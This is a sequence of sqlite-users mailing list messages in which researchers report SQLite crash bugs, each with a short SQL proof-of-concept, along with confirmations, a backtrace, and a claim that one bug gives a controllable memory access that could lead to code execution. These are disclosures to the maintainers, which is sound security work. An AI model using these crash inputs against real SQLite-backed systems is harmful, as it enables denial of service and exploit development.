[sqlite] Crash bug in Sqlite

2020-01-03 Thread Yongheng Chen
Hi,

We found a crash bug in sqlite. Here’s the POC:
—
CREATE VIRTUAL TABLE v0 USING rtree ( v3 AS( '1994-01-01' ) CHECK( v3 ) CHECK( 
v3 NOT LIKE 'y' ) GENERATED ALWAYS AS( ( SELECT 10.10 * AVG ( v3 ) FROM v0 
WHERE v1 = v3 ) ) , v2 , v1 ) ;
SELECT count ( * ) , max ( v3 ) FROM v0 ;
CREATE TABLE v4 ( v6 INTEGER , v5 INT ) ;
INSERT INTO v4 ( v5 ) VALUES ( 10 ) ,( 0.10 ) ;
SELECT * FROM v4 LEFT JOIN v0 ON v1 IN ( SELECT DISTINCT v6 LIMIT 0 ) AND v2 IN 
( 10 , 10 , 10 ) WHERE v1 = v1 AND v3 = 10 ;
—

This exists in the latest development code.

Yongheng & Rui
___
sqlite-users mailing list
sqlite-users@mailinglists.sqlite.org
http://mailinglists.sqlite.org/cgi-bin/mailman/listinfo/sqlite-users


[sqlite] Crash bug in sqlite

2020-01-03 Thread Yongheng Chen
Hi,

We found a crash bug in sqlite. Here’s the POC:
—
CREATE VIRTUAL TABLE v0 USING fts4 ( v1 AS( typeof ( v5 ) ) , v6 UNIQUE 
GENERATED ALWAYS AS( v5 ) , v2 INT , v3 INT UNIQUE GENERATED ALWAYS AS( NULL ) 
, v4 INTEGER UNIQUE , v5 DOUBLE PRIMARY KEY CHECK( v4 ) , v7 VARCHAR(20) UNIQUE 
) ;
INSERT INTO v0 ( v5 ) VALUES ( 9223372036854775808.00 );
REPLACE INTO zipfile SELECT * FROM v0 WHERE EXISTS ( SELECT v2 FROM v0 
INTERSECT SELECT v4 FROM v0 ) ;
—

This exists in the latest development code.

Yongheng & Rui


[sqlite] Crash Bug In sqlite

2019-12-31 Thread Yongheng Chen
Hi, 

We found a crash bug in sqlite. Here’s the POC:
—
CREATE VIRTUAL TABLE v0 USING fts4 ( v1 , v2 , v3 , v4 ) ;
INSERT INTO v0 ( v1 ) VALUES ( 10 ) ,( 10 ) ; 
CREATE TABLE v5 ( v6 UNIQUE NOT NULL PRIMARY KEY UNIQUE ) ; 
INSERT INTO v5 ( v6 , v6 ) SELECT nullif ( DISTINCT zeroblob ( julianday () ) , 
v3 ) , v1 + 10 FROM v0 ;
—

Here’s the backtrace:
—
#0  __memcmp_sse4_1 () at ../sysdeps/x86_64/multiarch/memcmp-sse4.S:69
#1  0x00661302 in sqlite3BlobCompare (pB1=, 
pB2=) at sqlite3.c:81071
#2  0x0063d703 in sqlite3VdbeMemAboutToChange (pVdbe=, 
pMem=) at sqlite3.c:75954
#3  0x00626b49 in sqlite3VdbeExec (p=) at sqlite3.c:85159
#4  0x004b076b in sqlite3Step (p=) at sqlite3.c:82730
#5  sqlite3_step (pStmt=) at sqlite3.c:17259
#6  0x00484686 in exec_prepared_stmt (pArg=0x7fff5a635990, 
pStmt=0x1956950) at shell.c:11383
#7  0x00442eea in shell_exec (pArg=, zSql=, pzErrMsg=) at shell.c:11688
#8  0x00487ad8 in runOneSqlLine (p=0x7fff5a635990,
zSql=0x193b480 "CREATE VIRTUAL TABLE v0 USING fts4 ( v1 , v2 , v3 , v4 ) ; 
INSERT INTO v0 ( v1 ) VALUES ( 10 ) ,( 10 ) ; CREATE TABLE v5 ( v6 UNIQUE NOT 
NULL PRIMARY KEY UNIQUE ) ; INSERT INTO v5 ( v6 , v6 ) SELECT n"...,
in=0x7f6b75fe38e0 <_IO_2_1_stdin_>, startline=1) at shell.c:18269
#9  0x00449a9f in process_input (p=) at shell.c:18369
#10 0x00418fb2 in main (argc=, argv=) at 
shell.c:19135
—

The bug exists in the latest development code. 

Yongheng & Rui


Re: [sqlite] Crash bug in sqlite

2019-12-24 Thread Richard Hipp
On 12/24/19, Yongheng Chen  wrote:
> Hi,
>
> We found a crash bug in sqlite.

Introduced yesterday afternoon by check-in
https://sqlite.org/src/info/eb95dac7f6482c36


-- 
D. Richard Hipp
d...@sqlite.org


[sqlite] Crash bug in sqlite

2019-12-24 Thread Yongheng Chen
Hi,

We found a crash bug in sqlite. Here’s the PoC:
—
CREATE TABLE v0 ( v1 INTEGER PRIMARY KEY ) ; INSERT INTO v0 ( v1 ) VALUES ( 0 ) 
,( 1 ) ,( 10 ) ON CONFLICT DO NOTHING ; 
CREATE VIRTUAL TABLE v2 USING rtree ( v5 UNIQUE ON CONFLICT ABORT , v4 , v3 ) ; 
SELECT 'MED BOX' - 'a' FROM v0 LEFT JOIN v2 ON v4 = 10 OR v5 = 10 ; SELECT * 
FROM v0 , v0 WHERE v1 = v1 AND v1 = 1;
—
The bug exists in the latest development code.

Yongheng & Rui


Re: [sqlite] Crash Bug in Sqlite

2019-12-19 Thread Jose Isaias Cabrera

Yongheng Chen, on Thursday, December 19, 2019 04:29 PM, wrote...
>
> Hi,
>
> We found another crash in Sqlite. Here’s the POC:
> —
> CREATE TABLE v0 ( v1 , v2 ) ;
> SELECT 10 , 1 UNION SELECT v2 , dense_rank () OVER( ORDER BY - 10 ) FROM
> v0 ;
> —
>
> This bug exists in both the latest development code and the release code.

Indeed, sqlite v3.30.0 for Windows crashes with this set of instructions...

josé


[sqlite] Crash Bug in Sqlite

2019-12-19 Thread Yongheng Chen
Hi,

We found another crash in Sqlite. Here’s the POC:
—
CREATE TABLE v0 ( v1 , v2 ) ; 
SELECT 10 , 1 UNION SELECT v2 , dense_rank () OVER( ORDER BY - 10 ) FROM v0 ;
—

This bug exists in both the latest development code and the release code. 

Yongheng & Rui


Re: [sqlite] Crash bug in Sqlite

2019-12-19 Thread Jose Isaias Cabrera

Yongheng Chen, on Thursday, December 19, 2019 01:21 PM, wrote...
>
> Hi,
>
> We found another crash in Sqlite. Here’s the POC:
> —
> CREATE TABLE v0 ( v1 INTEGER PRIMARY KEY ) ;
> CREATE VIEW v2 ( v3 ) AS SELECT DISTINCT ( SELECT DISTINCT v1 , v1 , v1 ,
> v3 , v1 , v3 , v1 , 10.10 ) ;
> CREATE TABLE v4 ( v5 INTEGER PRIMARY KEY , v6 INT );
> DELETE FROM v0 WHERE NULL BETWEEN ( SELECT v1 FROM v0 AS x GROUP BY v1
> ORDER BY 10 + sum ( v1 ) OVER( ORDER BY - 10 ) DESC ) AND 10 ;

Entering each of those lines above, one at a time, when I hit enter after the 
last line above, sqlite3 crashes right after.  So, I don't even need the line 
below.  This is using sqlite3 v3.30.0 in Windows.  Just an FYI.

> SELECT * FROM v4 , v2 WHERE v3 = v3 AND v3 = 10;
> —
>
> This bug exists in both the latest development code and the release code.
> (And thanks josé for the confirmation every time we report a bug).

You're welcome.  I have the SQLite3 tool open, so it's a "nice copy and paste" 
and see your replication text/steps go to work. ;-)

josé


[sqlite] Crash bug in Sqlite

2019-12-19 Thread Yongheng Chen
Hi,

We found another crash in Sqlite. Here’s the POC:
—
CREATE TABLE v0 ( v1 INTEGER PRIMARY KEY ) ;
CREATE VIEW v2 ( v3 ) AS SELECT DISTINCT ( SELECT DISTINCT v1 , v1 , v1 , v3 , 
v1 , v3 , v1 , 10.10 ) ;
CREATE TABLE v4 ( v5 INTEGER PRIMARY KEY , v6 INT );
DELETE FROM v0 WHERE NULL BETWEEN ( SELECT v1 FROM v0 AS x GROUP BY v1 ORDER BY 
10 + sum ( v1 ) OVER( ORDER BY - 10 ) DESC ) AND 10 ;
SELECT * FROM v4 , v2 WHERE v3 = v3 AND v3 = 10;
—

This bug exists in both the latest development code and the release code. (And 
thanks josé for the confirmation every time we report a bug).

Yongheng & Rui


Re: [sqlite] Crash bug in Sqlite

2019-12-19 Thread Jose Isaias Cabrera

Yongheng Chen, on Thursday, December 19, 2019 09:54 AM, wrote...
>
> Hi,
>
> We found another crash in Sqlite. Here’s the POC:
> —
> CREATE TABLE v0 ( v7 FLOAT , v3 DOUBLE , v6 TEXT , v1 INTEGER UNIQUE , v5
> DOUBLE , v2 VARCHAR(20) UNIQUE , v4 ) ;
> REPLACE INTO v0 ( v6 , v3 , v2 ) VALUES ( 10 , 10 , 10 );
> CREATE VIRTUAL TABLE v8 USING zipfile ( v9 DOUBLE ) ;
> REPLACE INTO v8 SELECT * FROM v0;
> —
>
> This bug exists in both the latest development code and the release code.

Crash confirmed in Windows Sqlite3 v3.30.0. Just fyi...

josé


[sqlite] Crash bug in Sqlite

2019-12-19 Thread Yongheng Chen
Hi,

We found another crash in Sqlite. Here’s the POC:
—
CREATE TABLE v0 ( v7 FLOAT , v3 DOUBLE , v6 TEXT , v1 INTEGER UNIQUE , v5 
DOUBLE , v2 VARCHAR(20) UNIQUE , v4 ) ;
REPLACE INTO v0 ( v6 , v3 , v2 ) VALUES ( 10 , 10 , 10 );
CREATE VIRTUAL TABLE v8 USING zipfile ( v9 DOUBLE ) ;
REPLACE INTO v8 SELECT * FROM v0;
—

This bug exists in both the latest development code and the release code.

Yongheng & Rui


Re: [sqlite] Crash bug in Sqlite

2019-12-18 Thread Jose Isaias Cabrera

Yongheng Chen, on Wednesday, December 18, 2019 10:45 AM, wrote...
>
> Hi,
>
> We found another crash in Sqlite. Here’s the POC:
>
> —
> CREATE TABLE v0 ( v2 INTEGER UNIQUE ON CONFLICT IGNORE , v1 TEXT PRIMARY
> KEY ) ;
> CREATE VIEW v3 ( v4 ) AS SELECT v2 IN ( 9223372036854775808 , ( printf ()
> IN ( 0 , 0 ) ) , 10 , 10 , 10 ) AS AVG_YEARLY FROM v0 ;
> CREATE TABLE v5 ( v6 , v7 ) ; INSERT INTO v0 VALUES ( 1.10 , 'y' ) ;
> INSERT INTO v5 VALUES ( 10 , 10 ) ;
> INSERT INTO v0 VALUES ( 10 , 10 ) ;
> SELECT DISTINCT v4 FROM v0 LEFT JOIN v3 ON v4 = 10 OR v4 = v3 . v4 ORDER
> BY v4 ;
> —
>
> This bug exists in both the latest development code and the release code.

Yep, took down sqlite3.exe with 3.30.0.  Just fyi.

josé


[sqlite] Crash bug in Sqlite

2019-12-18 Thread Yongheng Chen
Hi,

We found another crash in Sqlite. Here’s the POC:

—
CREATE TABLE v0 ( v2 INTEGER UNIQUE ON CONFLICT IGNORE , v1 TEXT PRIMARY KEY ) ;
CREATE VIEW v3 ( v4 ) AS SELECT v2 IN ( 9223372036854775808 , ( printf () IN ( 
0 , 0 ) ) , 10 , 10 , 10 ) AS AVG_YEARLY FROM v0 ;
CREATE TABLE v5 ( v6 , v7 ) ; INSERT INTO v0 VALUES ( 1.10 , 'y' ) ;
INSERT INTO v5 VALUES ( 10 , 10 ) ; 
INSERT INTO v0 VALUES ( 10 , 10 ) ; 
SELECT DISTINCT v4 FROM v0 LEFT JOIN v3 ON v4 = 10 OR v4 = v3 . v4 ORDER BY v4 ;
—

This bug exists in both the latest development code and the release code.

Yongheng & Rui


Re: [sqlite] Crash Bug in Sqlite

2019-12-17 Thread Yongheng Chen
It’s Yongheng & Rui. Sorry for the typo.

> On Dec 17, 2019, at 4:58 PM, Jose Isaias Cabrera  wrote:
> 
> 
> Yongheng Chen, on Tuesday, December 17, 2019 04:21 PM, wrote...
>> 
>> Hi,
>> 
>> We found a bug that crashes Sqlite. Here’s the test case:
>> 
>> ——
>> CREATE TABLE v0 ( v1 UNIQUE , v2 VARCHAR(80) NULL PRIMARY KEY ) ;
>> CREATE VIEW v3 ( v4 ) AS SELECT max ( ( SELECT count ( v1 ) OVER( ORDER
>> BY 10 ASC ) ) ) FROM v0 ;
>> SELECT * FROM v3 WHERE - 'b' >= v4 AND v4 > 10 OR ( v4 BETWEEN 10 AND 10
>> );
>> ——
>> 
>> This bug exists in both the development code and the latest release code.
> 
> Yep, 3.30.0 has the problem.
> 
> josé


Re: [sqlite] Crash Bug in Sqlite

2019-12-17 Thread Yongheng Chen
We just took a look at the bug. The value of the accessed address in the crash 
point can be controlled by the value in the second line of the test input, 
which means:

——
…….
CREATE VIEW v3 ( v4 ) AS SELECT max ( ( SELECT count ( v1 ) OVER( ORDER BY 1234 
ASC ) ) ) FROM v0 ; 
….. 
——

Then address 1234 will be accessed. We think this has the potential of 
achieving RCE.

Yongheng & Chen


> On Dec 17, 2019, at 4:58 PM, Jose Isaias Cabrera  wrote:
> 
> 
> Yongheng Chen, on Tuesday, December 17, 2019 04:21 PM, wrote...
>> 
>> Hi,
>> 
>> We found a bug that crashes Sqlite. Here’s the test case:
>> 
>> ——
>> CREATE TABLE v0 ( v1 UNIQUE , v2 VARCHAR(80) NULL PRIMARY KEY ) ;
>> CREATE VIEW v3 ( v4 ) AS SELECT max ( ( SELECT count ( v1 ) OVER( ORDER
>> BY 10 ASC ) ) ) FROM v0 ;
>> SELECT * FROM v3 WHERE - 'b' >= v4 AND v4 > 10 OR ( v4 BETWEEN 10 AND 10
>> );
>> ——
>> 
>> This bug exists in both the development code and the latest release code.
> 
> Yep, 3.30.0 has the problem.
> 
> josé
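When reproducing reports like the ones in this thread, the PoC should run in a throwaway child process so that a crash in the SQLite library does not take down the triage tool itself, and so that a library error ("sqlite error") is distinguished from an actual process death. The harness below is an added example written for this page, not code from the reporters or from the SQLite project; it assumes Python's bundled `sqlite3` module (whatever SQLite version the interpreter links) and uses a copy of the window-function test case quoted above as its sample input.

```python
"""Run each reported SQL PoC in a throwaway child process and classify the
outcome, so a crashing statement never takes down the triage process itself."""
import sqlite3
import subprocess
import sys
import textwrap

# Child program: reads one SQL script from stdin and executes it against an
# in-memory database. Exit 0 = ran clean, exit 1 = SQLite (or Python) reported
# an error, anything else = the process died: negative return code for a
# signal on POSIX, a large fault code such as 0xC0000005 on Windows.
CHILD = textwrap.dedent("""
    import sqlite3, sys
    con = sqlite3.connect(":memory:")
    try:
        con.executescript(sys.stdin.read())
    except sqlite3.Error as exc:
        print("sqlite error:", exc)
        sys.exit(1)
""")

# Copy of the window-function test case quoted in the thread above.
POC_WINDOW_ORDER_BY = """
CREATE TABLE v0 ( v1 UNIQUE , v2 VARCHAR(80) NULL PRIMARY KEY ) ;
CREATE VIEW v3 ( v4 ) AS SELECT max ( ( SELECT count ( v1 ) OVER( ORDER BY 10 ASC ) ) ) FROM v0 ;
SELECT * FROM v3 WHERE - 'b' >= v4 AND v4 > 10 OR ( v4 BETWEEN 10 AND 10 );
"""

def run_isolated(sql, timeout=30.0):
    """Return a dict with verdict 'ok', 'error', 'crash' or 'timeout' plus raw details."""
    try:
        proc = subprocess.run([sys.executable, "-c", CHILD], input=sql,
                              capture_output=True, text=True, timeout=timeout)
    except subprocess.TimeoutExpired:
        return {"verdict": "timeout", "returncode": None, "detail": ""}
    if proc.returncode == 0:
        verdict = "ok"
    elif proc.returncode == 1:
        verdict = "error"
    else:
        verdict = "crash"
    return {"verdict": verdict, "returncode": proc.returncode,
            "detail": (proc.stdout + proc.stderr).strip()}

def triage(cases):
    """Map each named PoC to its verdict against the SQLite linked into Python."""
    return {name: run_isolated(sql)["verdict"] for name, sql in cases.items()}

if __name__ == "__main__":
    print("linked SQLite:", sqlite3.sqlite_version)
    for name, verdict in triage({"window_order_by": POC_WINDOW_ORDER_BY}).items():
        print(f"{name}: {verdict}")
```

A current interpreter links a SQLite newer than 3.30.0, so the sample PoC is expected to come back "ok" or "error"; a "crash" verdict is the signal that the linked library is still affected.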


Re: [sqlite] Crash Bug in Sqlite

2019-12-17 Thread Jose Isaias Cabrera

Yongheng Chen, on Tuesday, December 17, 2019 04:21 PM, wrote...
>
> Hi,
>
> We found a bug that crashes Sqlite. Here’s the test case:
>
> ——
> CREATE TABLE v0 ( v1 UNIQUE , v2 VARCHAR(80) NULL PRIMARY KEY ) ;
> CREATE VIEW v3 ( v4 ) AS SELECT max ( ( SELECT count ( v1 ) OVER( ORDER
> BY 10 ASC ) ) ) FROM v0 ;
> SELECT * FROM v3 WHERE - 'b' >= v4 AND v4 > 10 OR ( v4 BETWEEN 10 AND 10
> );
> ——
>
> This bug exists in both the development code and the latest release code.

Yep, 3.30.0 has the problem.

josé


[sqlite] Crash Bug in Sqlite

2019-12-17 Thread Yongheng Chen
Hi, 

We found a bug that crashes Sqlite. Here’s the test case:

——
CREATE TABLE v0 ( v1 UNIQUE , v2 VARCHAR(80) NULL PRIMARY KEY ) ; 
CREATE VIEW v3 ( v4 ) AS SELECT max ( ( SELECT count ( v1 ) OVER( ORDER BY 10 
ASC ) ) ) FROM v0 ; 
SELECT * FROM v3 WHERE - 'b' >= v4 AND v4 > 10 OR ( v4 BETWEEN 10 AND 10 );
——

This bug exists in both the development code and the latest release code.

Yongheng & Rui